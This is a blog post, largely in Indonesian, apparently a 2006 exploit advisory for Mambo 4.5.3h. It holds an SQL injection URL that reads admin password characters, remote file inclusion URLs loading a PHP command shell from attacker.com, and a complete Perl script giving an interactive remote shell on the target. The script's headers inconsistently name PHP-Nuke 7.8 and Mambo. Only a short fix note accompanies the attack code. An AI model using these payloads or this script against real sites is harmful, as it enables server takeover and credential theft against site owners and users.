LaGiPusHinGWitH ---- IT

Navigation

Home |

Monthly Archives

Most recent entries

Syndicate

RSS 2.0
Atom

Site Credits

Design by:
BlogMoxie

Mambov4.5.3h Remote File Inclusion

Author: roninmorgue
Date: May, 29th 2006
Location: Indonesia, Jakarta
Web: http://www.forum.mercubuana-it.org/

------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This software is OSI Certified Open Source Software.
OSI Certified is a certification mark of the Open Source Initiative.

Mambo is Open Source software, released under the GNU General Public License (GPL).
The Mambo name and asterisk logo are copyrighted by the Mambo Foundation.

For more detailed information on Mambo’s licensing terms see the LICENSE file.
For more information on the Mambo Foundation,
please visit http://www.mambo-foundation.org.

Version : 4.5.3h
tested on 4.5.3h
not tested on other/older or maybe the newer version but it is
possible be the same
-----------------------------------------------------------------
A. SQL Injection

Fungsi mosMenuCheck()tidak melakukan sanitasi pada parameter variabel $task

/includes/mambo.php

Proof of Concept:
~~~~~~~~~~~~~~~
Vulnerable Script: mambo.php pada folder /includes.

SQL injection sample ->
http://www.target.com/index2.php?option ... %20FROM%20
mos_users%20WHERE%20username=’admin’%20AND%20MID(password,1,1)=
‘2’/*&id=24&Itemid=0
berfungsi efektif apabila “magic_quotes_gpc” disable/off.
------------------------------------------------------------------
B. Remote File Inclusion

Proof of Concept:
~~~~~~~~~~~~~~~
Vulnerable Script: usercp_confirm.php pada folder modules/Forums.

---------------usercp_confirm.php--------------------------------
...
include_once($phpbb_root_path . ‘extension.inc’);
...
------------------------------------------------------------------

Variabel $phpbb_root_path tidak disanitasi secara benar.
Saat register_globals=on dan allow_fopenurl=on maka penyerang dapat meng-exploitasi kelemahan
ini dengan php injection script.

Poc/Exploit:
~~~~~~~~~~~

http://www.target.com/[phpnuke_path]/modules.php?name=Forums&file;=
usercp_confirm?phpbb_root_path=http://www.attacker.com/evil_script?

cmd.txt
<?
echo "".passthru(' ls -la ; id ')."";
?>

http://www.target.com/[phpnuke_path]/modules.php?name=Forums&file;=
usercp_confirm?phpbb_root_path=http://www.attacker.com/cmd.txt?

Solution/The Fix:
~~~~~~~~~~~~~~
Non-aktifkan module forum/delete
Sanitasi script pada file usercp_confirm.php untuk mencegah vulnerability ini

Notification:
~~~~~~~~~~~
vendor sudah dihubungi
-----------------------------------------------------------------
Shoutz:
~~~~~~~
~ forum|staff (roninmorgue, darkstar, admin, qnoyyy, gaga, kalion, WaferStick, cloud, newbie)
~ mercubuana-it@yahoogroups.com ,

----------------------------------------------------------------
Contact:
~~~~~~~~
roninmorgue || forum|staff
Homepage: http://www.forum.mercubuana-it.org/
email: roninmorgue[at]yahoo[dot]co[dot]id

------------------------- [ EOF ] -------------------------------

Perl Exploit:
~~~~~~~~~~~
#!/usr/bin/perl
##
# PHP-Nuke-7.8 Remote Code Execution Exploit
# Bug Found & code By roninmorgue
# code reference from K-159 & uid0/zod at ExploiterCode.com
##
# usage:
# perl PHP-Nuke.pl <target> <cmd shell location> <cmd shell variable>
# perl PHP-Nuke.pl http://target.com/ http://attacker.com/cmd.txt cmd
# cmd shell example: <?passthru($_GET[cmd]);?>
# cmd shell variable: ($_GET[cmd]);
##
# Contact: roninmorgue@yahoo.co.id || http://www.forum.mercubuana-it.org
##

use LWP::UserAgent;

$Directory = $ARGV[0];
$DirectoryCommand = $ARGV[1];
$command = $ARGV[2];

if($Directory!~/http:/// || $DirectoryCommand!~/http:/// || !$command){usage()}
head();
while()
{
print “[shell] $”;
while(<STDIN>)
{
$cmdshell=$_;
chomp($cmdshell);

$exploit = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Directory.’/modules.php?name=Forums&file=usercp_confirm?
phpbb_root_path=’.$DirectoryCommand.’?&’.$command.’=’.$cmdshell)
or die “ Could Not connect “;

$res = $exploit->request($req);
$return = $res->content;
$return =~ tr/[ ]/[ê]/;

if (!$cmdshell) {print “ Please Enter a Command “; $return ="”;}

elsif ($return =~/failed to open stream: HTTP request failed!/ ||
$return =~/: Cannot execute a blank command in <b>/)
{print “ Could Not Connect to cmd Host or Invalid Command Variable “;exit}
elsif ($return =~/^<br.>.<b>Fatal.error/) {print “ Invalid Command or No Return “}

if($return =~ /(.*)/)
{
$finreturn = $1;
$finreturn=~ tr/[ê]/[ ]/;
print “ $finreturn “;
last;
}
else {print “[shell] $”;}}}last;
sub head()
{
print “ ======================================================= “;
print “ *MamboV4.5.3 Remote File Inclusion* “;
print “======================================================== “;
}
sub usage()
{
head();
print “ Usage: perl PHP-Nuke.pl <target> <cmd shell location> <cmd shell variable> “;
print “ <Site> - Full path to PHP-Nuke ex: http://www.site.com/ “;
print “ <cmd shell> - Path to cmd Shell e.g http://www.different-site.com/cmd.txt “;
print “ <cmd variable> - Command variable used in php shell “;
print “====================================================== “;
print “ Bug Found by roninmorgue “;
print “ Contact: roninmorgue@yahoo.co.id || http://www.forum.mercubuana-it.org “;
print “====================================================== “;
exit();
}

Posted by roninmorgue on 08/25 at 01:13 AM
Computer Hacking • (0) Comments • (202) Trackbacks • Permalink